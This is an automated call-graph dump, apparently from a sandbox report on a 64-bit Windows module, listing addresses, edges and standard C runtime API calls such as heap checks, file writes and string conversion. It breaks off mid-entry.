__GSHandlerCheck 8 API calls 17619->17620 17621 7ffc65cf3160 17620->17621 18087 7ffc65cfe830 18088 7ffc65cfe857 18087->18088 18089 7ffc65d03cc0 __SehTransFilter 39 API calls 18088->18089 18090 7ffc65cfe8e3 18089->18090 17622 7ffc65cfb12b 17623 7ffc65cfb14c 17622->17623 17624 7ffc65cfb2e0 17623->17624 17625 7ffc65cf6ea0 _invoke_watson_if_oneof 16 API calls 17623->17625 17626 7ffc65cfb33e 17624->17626 17627 7ffc65cfd490 std::exception::_Copy_str 17 API calls 17624->17627 17625->17624 17628 7ffc65d00cc0 25 API calls 17626->17628 17629 7ffc65cfb311 17627->17629 17630 7ffc65cfb358 17628->17630 17632 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 17629->17632 17631 7ffc65cfb37d 17630->17631 17633 7ffc65cfcff0 terminate 34 API calls 17630->17633 17636 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17631->17636 17632->17626 17634 7ffc65cfb373 17633->17634 17635 7ffc65cf7090 _exit 33 API calls 17634->17635 17635->17631 17637 7ffc65cfb3a0 17636->17637 18619 7ffc65d0c30d 18620 7ffc65d0c31a get_int64_arg _get_printf_count_output 18619->18620 18621 7ffc65d0c39d 18620->18621 18631 7ffc65d0c3f2 18620->18631 18622 7ffc65cfbd70 _invalid_parameter 17 API calls 18621->18622 18632 7ffc65d0bb0e _LocaleUpdate::~_LocaleUpdate 18622->18632 18623 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18625 7ffc65d0cd90 18623->18625 18624 7ffc65d0b99c 18626 7ffc65d0cc93 18624->18626 18629 7ffc65d0bada 18624->18629 18627 7ffc65cfbd70 _invalid_parameter 17 API calls 18626->18627 18626->18632 18627->18632 18628 7ffc65d0b530 wctomb_s 19 API calls 18628->18631 18630 7ffc65cfbd70 _invalid_parameter 17 API calls 18629->18630 18630->18632 18631->18624 18631->18628 18632->18623 18633 7ffc65cf9328 18634 7ffc65cf9336 EnterCriticalSection 18633->18634 18635 7ffc65cf932c 18633->18635 18635->18634 18091 7ffc65d0d410 18096 7ffc65d0d3e0 18091->18096 18094 7ffc65d0d43c 18095 7ffc65d0d710 _Ref_count LeaveCriticalSection 18095->18094 18099 7ffc65d10070 18096->18099 18102 7ffc65d10083 _free_nolock 18099->18102 18101 7ffc65d0d402 18101->18094 18101->18095 18103 7ffc65cf9360 LeaveCriticalSection 18102->18103 18103->18101 17131 7ffc65cf5a25 17132 7ffc65cf5a37 17131->17132 17133 7ffc65cfbd70 _invalid_parameter 17 API calls 17132->17133 17134 7ffc65cf5aaf 17133->17134 17638 7ffc65d04920 17641 7ffc65d0d530 17638->17641 17644 7ffc65d0d580 17641->17644 17645 7ffc65d0d59a std::exception::_Tidy 17644->17645 17646 7ffc65d0493d 17644->17646 17645->17646 17648 7ffc65d0d660 17645->17648 17649 7ffc65d0d676 std::exception::_Copy_str malloc 17648->17649 17651 7ffc65d0d6bf 17648->17651 17650 7ffc65cfd490 std::exception::_Copy_str 17 API calls 17649->17650 17649->17651 17650->17651 17651->17646 18651 7ffc65cf66da 18652 7ffc65cf6725 18651->18652 18653 7ffc65cf6745 18651->18653 18652->18653 18657 7ffc65cf9a70 18652->18657 18654 7ffc65cf677f 18653->18654 18656 7ffc65cf9b10 __updatetmbcinfo LeaveCriticalSection 18653->18656 18656->18654 18658 7ffc65cf9a79 _updatetlocinfoEx_nolock 18657->18658 18659 7ffc65cf9ad8 18658->18659 18661 7ffc65cf9360 LeaveCriticalSection 18658->18661 18659->18653 18661->18659 18104 7ffc65d0bfde 18105 7ffc65d0c00c 18104->18105 18106 7ffc65d0b99c 18105->18106 18109 7ffc65d0b530 wctomb_s 19 API calls 18105->18109 18107 7ffc65d0cc93 18106->18107 18112 7ffc65d0bada 18106->18112 18108 7ffc65cfbd70 _invalid_parameter 17 API calls 18107->18108 18111 7ffc65d0bb0e _LocaleUpdate::~_LocaleUpdate 18107->18111 18108->18111 18109->18105 18110 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18113 7ffc65d0cd90 18110->18113 18111->18110 18114 7ffc65cfbd70 _invalid_parameter 17 API calls 18112->18114 18114->18111 18685 7ffc65cf5ad9 18686 7ffc65cf5add 18685->18686 18687 7ffc65cf6380 _CrtIsValidHeapPointer HeapValidate 18686->18687 18689 7ffc65cf5b3a 18687->18689 18691 7ffc65cf9360 LeaveCriticalSection 18689->18691 18690 7ffc65cf5c14 18691->18690 17144 7ffc65d0ade0 17149 7ffc65d0fee0 17144->17149 17148 7ffc65d0adf9 17159 7ffc65d0ff00 17149->17159 17151 7ffc65d0ade9 17151->17148 17152 7ffc65d0fc70 17151->17152 17158 7ffc65d0fc86 17152->17158 17153 7ffc65d0fd59 17230 7ffc65cf9360 LeaveCriticalSection 17153->17230 17155 7ffc65d0fd63 17155->17148 17157 7ffc65d0fd09 DeleteCriticalSection 17157->17158 17158->17153 17158->17157 17219 7ffc65d10580 17158->17219 17160 7ffc65d0ff22 17159->17160 17161 7ffc65d10042 17160->17161 17162 7ffc65d0ff47 17160->17162 17192 7ffc65cf9360 LeaveCriticalSection 17161->17192 17164 7ffc65d1003d 17162->17164 17174 7ffc65d0ae90 17162->17174 17164->17151 17165 7ffc65d1004c 17165->17151 17167 7ffc65d0ff97 17168 7ffc65d0ffd0 17167->17168 17170 7ffc65d0ffe1 17167->17170 17171 7ffc65d0ffbb 17167->17171 17187 7ffc65d0af60 17168->17187 17170->17168 17173 7ffc65d0fd70 _fflush_nolock 25 API calls 17170->17173 17177 7ffc65d0fd70 17171->17177 17173->17168 17175 7ffc65d0aec8 EnterCriticalSection 17174->17175 17176 7ffc65d0aea4 17174->17176 17175->17176 17176->17167 17178 7ffc65d0fd81 17177->17178 17179 7ffc65d0fd8a 17177->17179 17181 7ffc65d0ff00 _fflush_nolock 25 API calls 17178->17181 17193 7ffc65d0fdf0 17179->17193 17186 7ffc65d0fd88 17181->17186 17182 7ffc65d0fd94 17182->17186 17197 7ffc65d0afb0 17182->17197 17186->17168 17188 7ffc65d0af74 17187->17188 17189 7ffc65d0af98 LeaveCriticalSection 17187->17189 17218 7ffc65cf9360 LeaveCriticalSection 17188->17218 17191 7ffc65d0af96 17189->17191 17191->17164 17192->17165 17194 7ffc65d0fe1f 17193->17194 17196 7ffc65d0fe5d 17193->17196 17195 7ffc65d0afb0 _fflush_nolock 17 API calls 17194->17195 17194->17196 17195->17196 17196->17182 17199 7ffc65d0afc1 17197->17199 17198 7ffc65d0b04b 17201 7ffc65d107c0 17198->17201 17199->17198 17200 7ffc65cfbd70 _invalid_parameter 17 API calls 17199->17200 17200->17198 17202 7ffc65d107d3 17201->17202 17204 7ffc65d107e8 17201->17204 17202->17186 17203 7ffc65d10851 17206 7ffc65cfbd70 _invalid_parameter 17 API calls 17203->17206 17204->17203 17205 7ffc65d1088f 17204->17205 17207 7ffc65d10951 17205->17207 17208 7ffc65d10913 17205->17208 17206->17202 17209 7ffc65d0fae0 _fflush_nolock 3 API calls 17207->17209 17211 7ffc65cfbd70 _invalid_parameter 17 API calls 17208->17211 17210 7ffc65d1095a 17209->17210 17212 7ffc65d0f900 _fflush_nolock 17 API calls 17210->17212 17215 7ffc65d109ab __doserrno 17210->17215 17211->17202 17213 7ffc65d10992 FlushFileBuffers 17212->17213 17214 7ffc65d1099f GetLastError 17213->17214 17213->17215 17214->17215 17217 7ffc65d0fbc0 LeaveCriticalSection 17215->17217 17217->17202 17218->17191 17222 7ffc65d10599 17219->17222 17220 7ffc65d105ef 17224 7ffc65cfbd70 _invalid_parameter 17 API calls 17220->17224 17221 7ffc65d1062a 17226 7ffc65d10623 17221->17226 17231 7ffc65d0ae10 17221->17231 17222->17220 17222->17221 17224->17226 17225 7ffc65d10651 17235 7ffc65d10680 17225->17235 17226->17158 17228 7ffc65d1065c 17246 7ffc65d0aee0 17228->17246 17230->17155 17232 7ffc65d0ae77 EnterCriticalSection 17231->17232 17233 7ffc65d0ae27 17231->17233 17234 7ffc65d0ae3b 17232->17234 17233->17232 17233->17234 17234->17225 17236 7ffc65d10699 17235->17236 17237 7ffc65d1072d 17236->17237 17238 7ffc65d106ef 17236->17238 17239 7ffc65d0fdf0 _fflush_nolock 17 API calls 17237->17239 17245 7ffc65d10723 17237->17245 17240 7ffc65cfbd70 _invalid_parameter 17 API calls 17238->17240 17241 7ffc65d10752 17239->17241 17240->17245 17242 7ffc65d0afb0 _fflush_nolock 17 API calls 17241->17242 17243 7ffc65d1076a 17242->17243 17252 7ffc65d10a20 17243->17252 17245->17228 17247 7ffc65d0af47 LeaveCriticalSection 17246->17247 17248 7ffc65d0aef7 17246->17248 17250 7ffc65d0af45 17247->17250 17248->17247 17249 7ffc65d0af0b 17248->17249 17288 7ffc65cf9360 LeaveCriticalSection 17249->17288 17250->17226 17253 7ffc65d10a53 17252->17253 17260 7ffc65d10a33 __doserrno 17252->17260 17254 7ffc65d10b05 17253->17254 17255 7ffc65d10abc __doserrno 17253->17255 17256 7ffc65d10bd2 17254->17256 17261 7ffc65d10b89 __doserrno 17254->17261 17257 7ffc65cfbd70 _invalid_parameter 17 API calls 17255->17257 17258 7ffc65d0fae0 _fflush_nolock 3 API calls 17256->17258 17257->17260 17259 7ffc65d10bdb 17258->17259 17264 7ffc65d10c13 17259->17264 17266 7ffc65d10c80 17259->17266 17260->17245 17263 7ffc65cfbd70 _invalid_parameter 17 API calls 17261->17263 17263->17260 17279 7ffc65d0fbc0 LeaveCriticalSection 17264->17279 17267 7ffc65d0f900 _fflush_nolock 17 API calls 17266->17267 17270 7ffc65d10c91 17267->17270 17268 7ffc65d10d05 17280 7ffc65d0f7d0 17268->17280 17269 7ffc65d10ce5 17269->17268 17273 7ffc65d0f900 _fflush_nolock 17 API calls 17269->17273 17270->17268 17270->17269 17272 7ffc65d0f900 _fflush_nolock 17 API calls 17270->17272 17274 7ffc65d10cd6 17272->17274 17275 7ffc65d10cf8 CloseHandle 17273->17275 17276 7ffc65d0f900 _fflush_nolock 17 API calls 17274->17276 17275->17268 17277 7ffc65d10d0f GetLastError 17275->17277 17276->17269 17277->17268 17278 7ffc65d10d22 _dosmaperr 17278->17264 17279->17260 17281 7ffc65d0f7e3 17280->17281 17282 7ffc65d0f878 __doserrno 17280->17282 17281->17282 17283 7ffc65d0f87a SetStdHandle 17281->17283 17284 7ffc65d0f86a 17281->17284 17282->17278 17283->17282 17285 7ffc65d0f871 17284->17285 17286 7ffc65d0f889 SetStdHandle 17284->17286 17285->17282 17287 7ffc65d0f898 SetStdHandle 17285->17287 17286->17282 17287->17282 17288->17250 18118 7ffc65cf33d6 18121 7ffc65cf88d0 HeapDestroy 18118->18121 18120 7ffc65cf33db 18121->18120 17652 7ffc65cf34d5 17653 7ffc65cf34da _calloc_dbg 17652->17653 17654 7ffc65cf350b FlsSetValue 17653->17654 17658 7ffc65cf3548 17653->17658 17655 7ffc65cf3520 17654->17655 17654->17658 17656 7ffc65cf3e30 LeaveCriticalSection 17655->17656 17657 7ffc65cf352c GetCurrentThreadId 17656->17657 17657->17658 18719 7ffc65d09aeb 18720 7ffc65d09b2c 18719->18720 18721 7ffc65d09b18 18719->18721 18722 7ffc65d0ab10 17 API calls 18720->18722 18723 7ffc65d09520 19 API calls 18721->18723 18728 7ffc65d09b38 18722->18728 18723->18720 18724 7ffc65d09c04 18725 7ffc65d0a1cb 18724->18725 18729 7ffc65d09c23 GetConsoleCP 18724->18729 18726 7ffc65d0a8ad WriteFile 18725->18726 18727 7ffc65d0a205 18725->18727 18732 7ffc65d0a923 GetLastError 18726->18732 18752 7ffc65d09dd9 _dosmaperr __doserrno 18726->18752 18730 7ffc65d0a400 18727->18730 18731 7ffc65d0a21a 18727->18731 18728->18724 18733 7ffc65d09bae GetConsoleMode 18728->18733 18755 7ffc65d09c4d 18729->18755 18747 7ffc65d0a40e 18730->18747 18753 7ffc65d0a5f3 18730->18753 18734 7ffc65d0a33e WriteFile 18731->18734 18731->18752 18732->18752 18733->18724 18734->18731 18739 7ffc65d0a3ea GetLastError 18734->18739 18735 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18738 7ffc65d0a9f5 18735->18738 18736 7ffc65d09f66 WideCharToMultiByte 18741 7ffc65d09fbf WriteFile 18736->18741 18736->18752 18737 7ffc65d0a726 WideCharToMultiByte 18742 7ffc65d0a791 GetLastError 18737->18742 18737->18753 18739->18752 18740 7ffc65d0a531 WriteFile 18743 7ffc65d0a5dd GetLastError 18740->18743 18740->18747 18744 7ffc65d0a050 GetLastError 18741->18744 18741->18755 18742->18752 18743->18752 18744->18752 18744->18755 18745 7ffc65d0a7b0 WriteFile 18748 7ffc65d0a857 GetLastError 18745->18748 18745->18753 18746 7ffc65d0fc00 WriteConsoleW CreateFileW _putwch_nolock 18746->18755 18747->18740 18747->18752 18748->18753 18749 7ffc65d0a158 GetLastError 18749->18752 18750 7ffc65d0f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18750->18755 18751 7ffc65d0a06d WriteFile 18754 7ffc65d0a103 GetLastError 18751->18754 18751->18755 18752->18735 18753->18737 18753->18745 18753->18752 18754->18752 18755->18736 18755->18746 18755->18749 18755->18750 18755->18751 18755->18752 18756 7ffc65d0a1b5 GetLastError 18755->18756 18756->18752 17663 7ffc65cf68c4 17665 7ffc65cf68d1 17663->17665 17664 7ffc65cf6ba6 17681 7ffc65cf9360 LeaveCriticalSection 17664->17681 17665->17664 17668 7ffc65cf68ed _CrtIsValidPointer 17665->17668 17667 7ffc65cf6bb0 17669 7ffc65cf6976 17668->17669 17670 7ffc65cf695e IsBadReadPtr 17668->17670 17678 7ffc65cf692f 17668->17678 17671 7ffc65cf6ad2 17669->17671 17672 7ffc65cf6a29 17669->17672 17670->17669 17673 7ffc65cf6add 17671->17673 17676 7ffc65cf6b2d 17671->17676 17674 7ffc65cf6a86 IsBadReadPtr 17672->17674 17675 7ffc65cf6abe 17672->17675 17677 7ffc65cf6bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17673->17677 17674->17675 17674->17678 17679 7ffc65cf6bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17675->17679 17676->17678 17680 7ffc65cf6bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17676->17680 17677->17678 17679->17678 17680->17678 17681->17667 18772 7ffc65d076c0 18773 7ffc65d07be3 _CrtMemDumpAllObjectsSince 18772->18773 18774 7ffc65d076cf _CrtMemDumpAllObjectsSince 18772->18774 18775 7ffc65d07cc6 WideCharToMultiByte 18773->18775 18785 7ffc65d076e6 _LocaleUpdate::~_LocaleUpdate 18773->18785 18776 7ffc65d07905 _CrtMemDumpAllObjectsSince 18774->18776 18777 7ffc65d077f5 _CrtMemDumpAllObjectsSince wcsncnt 18774->18777 18774->18785 18775->18785 18778 7ffc65d0790f WideCharToMultiByte 18776->18778 18781 7ffc65d07827 WideCharToMultiByte 18777->18781 18780 7ffc65d07965 18778->18780 18779 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18782 7ffc65d07d85 18779->18782 18783 7ffc65d0799a GetLastError 18780->18783 18780->18785 18781->18785 18783->18785 18786 7ffc65d079d3 _CrtMemDumpAllObjectsSince 18783->18786 18784 7ffc65d07a05 WideCharToMultiByte 18784->18785 18784->18786 18785->18779 18786->18784 18786->18785 17691 7ffc65d0bcbd 17692 7ffc65d0b99c 17691->17692 17693 7ffc65d0cc93 17692->17693 17696 7ffc65d0bada 17692->17696 17694 7ffc65cfbd70 _invalid_parameter 17 API calls 17693->17694 17695 7ffc65d0bb0e _LocaleUpdate::~_LocaleUpdate 17693->17695 17694->17695 17697 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17695->17697 17699 7ffc65cfbd70 _invalid_parameter 17 API calls 17696->17699 17698 7ffc65d0cd90 17697->17698 17699->17695 18133 7ffc65cf53fb 18134 7ffc65cf541d _realloc_dbg 18133->18134 18136 7ffc65cf5421 18134->18136 18139 7ffc65cf6380 18134->18139 18137 7ffc65cf54de _calloc_dbg_impl _realloc_dbg 18138 7ffc65cfc020 _free_base 2 API calls 18137->18138 18138->18136 18140 7ffc65cf6395 _CrtIsValidPointer 18139->18140 18142 7ffc65cf6391 18139->18142 18141 7ffc65cf63b6 HeapValidate 18140->18141 18140->18142 18141->18142 18142->18137 16250 7ffc65cf6ff2 16251 7ffc65cf6ffe 16250->16251 16254 7ffc65cfca00 16251->16254 16253 7ffc65cf7011 _initterm_e 16255 7ffc65cfca0e 16254->16255 16256 7ffc65cfca4b 16255->16256 16257 7ffc65cfca23 EncodePointer 16255->16257 16256->16253 16257->16255 18147 7ffc65cff7f1 18148 7ffc65cff80d 18147->18148 18152 7ffc65cff8de _wcsftime_l 18147->18152 18204 7ffc65d06fb0 18148->18204 18150 7ffc65cffa70 18211 7ffc65d069c0 18150->18211 18155 7ffc65cff9f4 18152->18155 18173 7ffc65cf6ea0 _invoke_watson_if_oneof 16 API calls 18152->18173 18174 7ffc65cff996 18152->18174 18153 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18156 7ffc65cff85a OutputDebugStringA 18153->18156 18155->18150 18158 7ffc65cfd490 std::exception::_Copy_str 17 API calls 18155->18158 18159 7ffc65cff872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 18156->18159 18157 7ffc65cffa8a 18160 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18157->18160 18161 7ffc65cffa43 18158->18161 18202 7ffc65cff8ce 18159->18202 18163 7ffc65cffab7 18160->18163 18164 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18161->18164 18165 7ffc65cffb24 18163->18165 18166 7ffc65d069c0 17 API calls 18163->18166 18179 7ffc65cffb6a 18163->18179 18164->18150 18167 7ffc65d069c0 17 API calls 18165->18167 18168 7ffc65cffaf7 18166->18168 18169 7ffc65cffb3d 18167->18169 18170 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18168->18170 18171 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18169->18171 18170->18165 18171->18179 18172 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18175 7ffc65d0011d 18172->18175 18173->18174 18174->18155 18176 7ffc65cfd490 std::exception::_Copy_str 17 API calls 18174->18176 18177 7ffc65cff9c7 18176->18177 18178 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18177->18178 18178->18155 18180 7ffc65cf6ea0 _invoke_watson_if_oneof 16 API calls 18179->18180 18182 7ffc65cffc39 18179->18182 18180->18182 18181 7ffc65cffc97 18224 7ffc65d06970 18181->18224 18182->18181 18183 7ffc65cfd490 std::exception::_Copy_str 17 API calls 18182->18183 18184 7ffc65cffc6a 18183->18184 18186 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18184->18186 18186->18181 18188 7ffc65cf6ea0 _invoke_watson_if_oneof 16 API calls 18189 7ffc65cffd6e 18188->18189 18190 7ffc65d01640 17 API calls 18189->18190 18200 7ffc65cffdbb 18189->18200 18191 7ffc65cffd8e 18190->18191 18192 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18191->18192 18192->18200 18193 7ffc65cfffef 18194 7ffc65d00008 OutputDebugStringA 18193->18194 18195 7ffc65d00016 18193->18195 18194->18195 18199 7ffc65d06fb0 _itow_s 17 API calls 18195->18199 18195->18202 18197 7ffc65cfff03 std::exception::_Copy_str 18197->18193 18198 7ffc65cfffaa WriteFile 18197->18198 18197->18202 18198->18193 18201 7ffc65d00065 18199->18201 18200->18197 18227 7ffc65cf9360 LeaveCriticalSection 18200->18227 18203 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18201->18203 18202->18172 18203->18202 18205 7ffc65d06fd6 18204->18205 18206 7ffc65d07003 18204->18206 18205->18206 18208 7ffc65d06fdd 18205->18208 18207 7ffc65d07030 _itow_s 17 API calls 18206->18207 18210 7ffc65cff82d 18207->18210 18228 7ffc65d07030 18208->18228 18210->18153 18212 7ffc65d069e1 18211->18212 18213 7ffc65d06a42 18212->18213 18215 7ffc65d06a80 _calloc_dbg_impl 18212->18215 18214 7ffc65cfbd70 _invalid_parameter 17 API calls 18213->18214 18217 7ffc65d06a76 _calloc_dbg_impl 18214->18217 18216 7ffc65d06b6e 18215->18216 18221 7ffc65d06bac _calloc_dbg_impl 18215->18221 18218 7ffc65cfbd70 _invalid_parameter 17 API calls 18216->18218 18217->18157 18218->18217 18219 7ffc65d06ce8 18222 7ffc65cfbd70 _invalid_parameter 17 API calls 18219->18222 18220 7ffc65d06d26 _calloc_dbg_impl 18220->18217 18223 7ffc65cfbd70 _invalid_parameter 17 API calls 18220->18223 18221->18219 18221->18220 18222->18217 18223->18217 18244 7ffc65d063e0 18224->18244 18226 7ffc65cffd20 18226->18188 18227->18197 18229 7ffc65d07055 18228->18229 18230 7ffc65d070ab 18229->18230 18233 7ffc65d070e9 18229->18233 18231 7ffc65cfbd70 _invalid_parameter 17 API calls 18230->18231 18241 7ffc65d070df 18231->18241 18232 7ffc65d0714a 18234 7ffc65cfbd70 _invalid_parameter 17 API calls 18232->18234 18233->18232 18237 7ffc65d07188 _calloc_dbg_impl 18233->18237 18234->18241 18235 7ffc65d07287 18238 7ffc65cfbd70 _invalid_parameter 17 API calls 18235->18238 18236 7ffc65d072c5 18239 7ffc65d07338 18236->18239 18242 7ffc65d07376 18236->18242 18237->18235 18237->18236 18238->18241 18240 7ffc65cfbd70 _invalid_parameter 17 API calls 18239->18240 18240->18241 18241->18210 18242->18241 18243 7ffc65cfbd70 _invalid_parameter 17 API calls 18242->18243 18243->18241 18246 7ffc65d0640e 18244->18246 18245 7ffc65d0648e 18247 7ffc65cfbd70 _invalid_parameter 17 API calls 18245->18247 18246->18245 18249 7ffc65d064cc _calloc_dbg_impl 18246->18249 18248 7ffc65d064c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 18247->18248 18248->18226 18250 7ffc65d0663f 18249->18250 18251 7ffc65d0668e _CrtMemDumpAllObjectsSince 18249->18251 18253 7ffc65cfbd70 _invalid_parameter 17 API calls 18250->18253 18256 7ffc65d05ea0 18251->18256 18253->18248 18254 7ffc65d066b5 _calloc_dbg_impl 18254->18248 18255 7ffc65cfbd70 _invalid_parameter 17 API calls 18254->18255 18255->18248 18259 7ffc65d05ecf 18256->18259 18257 7ffc65d05fae 18261 7ffc65d062e1 _CrtMemDumpAllObjectsSince 18257->18261 18262 7ffc65d05fcf _CrtMemDumpAllObjectsSince 18257->18262 18258 7ffc65d05f6e 18260 7ffc65cfbd70 _invalid_parameter 17 API calls 18258->18260 18259->18257 18259->18258 18266 7ffc65d05eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 18259->18266 18260->18266 18263 7ffc65d0632f MultiByteToWideChar 18261->18263 18261->18266 18264 7ffc65d060a1 MultiByteToWideChar 18262->18264 18262->18266 18263->18266 18265 7ffc65d0610e GetLastError 18264->18265 18264->18266 18265->18266 18268 7ffc65d06154 _CrtMemDumpAllObjectsSince wcsxfrm 18265->18268 18266->18254 18267 7ffc65d06238 MultiByteToWideChar 18267->18266 18268->18266 18268->18267 17302 7ffc65cf91ea 17303 7ffc65cf91ef 17302->17303 17304 7ffc65cf74e0 __crtExitProcess 3 API calls 17303->17304 17305 7ffc65cf9203 17304->17305 17706 7ffc65cfd0ea 17707 7ffc65cfd0ef 17706->17707 17708 7ffc65cf7090 _exit 33 API calls 17707->17708 17709 7ffc65cfd209 17707->17709 17713 7ffc65cfd0fc 17707->17713 17708->17709 17711 7ffc65cfd289 17709->17711 17714 7ffc65cf3d00 RtlEncodePointer 17709->17714 17711->17713 17715 7ffc65cf9360 LeaveCriticalSection 17711->17715 17714->17711 17715->17713 17306 7ffc65d075e9 17307 7ffc65d075f4 17306->17307 17310 7ffc65d075fb 17306->17310 17308 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17307->17308 17309 7ffc65d07d85 17308->17309 17311 7ffc65cfbd70 _invalid_parameter 17 API calls 17310->17311 17311->17307 18269 7ffc65cfc7e9 18270 7ffc65cfc90c EncodePointer EncodePointer 18269->18270 18271 7ffc65cfc80d 18269->18271 18272 7ffc65cfc8ca 18270->18272 18273 7ffc65cfc872 18271->18273 18278 7ffc65cf4a00 18271->18278 18273->18272 18275 7ffc65cf4a00 _realloc_dbg 30 API calls 18273->18275 18276 7ffc65cfc8ce EncodePointer 18273->18276 18277 7ffc65cfc8bd 18275->18277 18276->18270 18277->18272 18277->18276 18279 7ffc65cf4a22 18278->18279 18284 7ffc65cf4a70 18279->18284 18281 7ffc65cf4a4c 18295 7ffc65cf9360 LeaveCriticalSection 18281->18295 18283 7ffc65cf4a5b 18283->18273 18286 7ffc65cf4ad4 _realloc_dbg 18284->18286 18294 7ffc65cf4aae _calloc_dbg_impl 18284->18294 18285 7ffc65cf6380 _CrtIsValidHeapPointer HeapValidate 18287 7ffc65cf4e2c 18285->18287 18286->18285 18286->18294 18288 7ffc65cf4f64 18287->18288 18289 7ffc65cf4f90 18287->18289 18287->18294 18296 7ffc65cfbc30 18288->18296 18311 7ffc65cfba60 18289->18311 18292 7ffc65cf4fa6 18293 7ffc65cf4fba HeapSize 18292->18293 18292->18294 18293->18294 18294->18281 18295->18283 18297 7ffc65cfbc50 18296->18297 18298 7ffc65cfbc5f 18296->18298 18322 7ffc65cfabf0 18297->18322 18300 7ffc65cfbc67 18298->18300 18305 7ffc65cfbc78 18298->18305 18301 7ffc65cfc020 _free_base 2 API calls 18300->18301 18308 7ffc65cfbc5a _get_errno_from_oserr 18301->18308 18302 7ffc65cfbcba 18304 7ffc65cfabb0 _callnewh DecodePointer 18302->18304 18303 7ffc65cfbc9a HeapReAlloc 18303->18305 18304->18308 18305->18302 18305->18303 18306 7ffc65cfbce4 18305->18306 18309 7ffc65cfabb0 _callnewh DecodePointer 18305->18309 18310 7ffc65cfbd1f GetLastError 18305->18310 18307 7ffc65cfbcee GetLastError 18306->18307 18306->18308 18307->18308 18308->18294 18309->18305 18310->18308 18312 7ffc65cfba76 18311->18312 18313 7ffc65cfbb07 18312->18313 18314 7ffc65cfbacc 18312->18314 18315 7ffc65cfbb00 _get_errno_from_oserr 18313->18315 18316 7ffc65cfbb32 HeapSize HeapReAlloc 18313->18316 18318 7ffc65cfbd70 _invalid_parameter 17 API calls 18314->18318 18315->18292 18316->18315 18317 7ffc65cfbb74 18316->18317 18319 7ffc65cfbba0 GetLastError 18317->18319 18328 7ffc65cfbbd0 HeapQueryInformation 18317->18328 18318->18315 18319->18315 18323 7ffc65cfac4d 18322->18323 18325 7ffc65cfac0a 18322->18325 18324 7ffc65cfabb0 _callnewh DecodePointer 18323->18324 18326 7ffc65cfac21 18324->18326 18325->18326 18327 7ffc65cfabb0 _callnewh DecodePointer 18325->18327 18326->18308 18327->18325 18329 7ffc65cfbb90 18328->18329 18329->18315 18329->18319 18330 7ffc65cfa7e9 18332 7ffc65cfa7f9 18330->18332 18331 7ffc65cfa80a 18332->18331 18333 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18332->18333 18334 7ffc65cfaa30 18333->18334 17720 7ffc65cf70e6 17721 7ffc65cf7090 _exit 33 API calls 17720->17721 17722 7ffc65cf70f0 17721->17722 17723 7ffc65d044e5 17724 7ffc65d0445a __SehTransFilter 17723->17724 17725 7ffc65d0466c __SehTransFilter 17724->17725 17731 7ffc65d05180 __SehTransFilter 38 API calls 17724->17731 17726 7ffc65d047d7 17725->17726 17729 7ffc65d05bb0 __SehTransFilter 36 API calls 17725->17729 17727 7ffc65d0485b 17726->17727 17728 7ffc65cfcf80 _inconsistency 36 API calls 17726->17728 17728->17727 17730 7ffc65d04727 17729->17730 17730->17726 17732 7ffc65cfe500 __SetUnwindTryBlock 37 API calls 17730->17732 17731->17724 17733 7ffc65d04767 17732->17733 17734 7ffc65cfedc0 __SehTransFilter 9 API calls 17733->17734 17734->17726 18829 7ffc65d012e3 LoadLibraryW 18830 7ffc65d01304 GetProcAddress 18829->18830 18838 7ffc65d012fd 18829->18838 18831 7ffc65d0132a 7 API calls 18830->18831 18830->18838 18833 7ffc65d013b3 GetProcAddress EncodePointer 18831->18833 18835 7ffc65d013d5 18831->18835 18832 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18834 7ffc65d0157a 18832->18834 18833->18835 18836 7ffc65d013f9 DecodePointer DecodePointer 18835->18836 18839 7ffc65d01428 DecodePointer 18835->18839 18836->18839 18838->18832 18839->18838 18840 7ffc65cf7ae3 18844 7ffc65cf7af3 18840->18844 18841 7ffc65cf7ce0 SetHandleCount 18849 7ffc65cf7c74 18841->18849 18842 7ffc65cf7c7b 18842->18841 18843 7ffc65cf7b95 GetStdHandle 18843->18842 18845 7ffc65cf7bb9 18843->18845 18844->18841 18844->18842 18844->18843 18845->18842 18846 7ffc65cf7bc8 GetFileType 18845->18846 18846->18842 18847 7ffc65cf7beb InitializeCriticalSectionAndSpinCount 18846->18847 18847->18842 18847->18849 16553 7ffc65cf7de0 16554 7ffc65cf7ded 16553->16554 16558 7ffc65cf7df2 std::exception::_Copy_str _calloc_dbg 16553->16558 16560 7ffc65cfaa40 16554->16560 16556 7ffc65cf7e0e 16558->16556 16564 7ffc65cfd490 16558->16564 16574 7ffc65cf7ff0 16558->16574 16561 7ffc65cfaa57 16560->16561 16562 7ffc65cfaa4d 16560->16562 16561->16558 16578 7ffc65cf9c10 16562->16578 16565 7ffc65cfd4b1 16564->16565 16566 7ffc65cfd512 16565->16566 16568 7ffc65cfd550 _calloc_dbg_impl 16565->16568 16567 7ffc65cfbd70 _invalid_parameter 17 API calls 16566->16567 16570 7ffc65cfd546 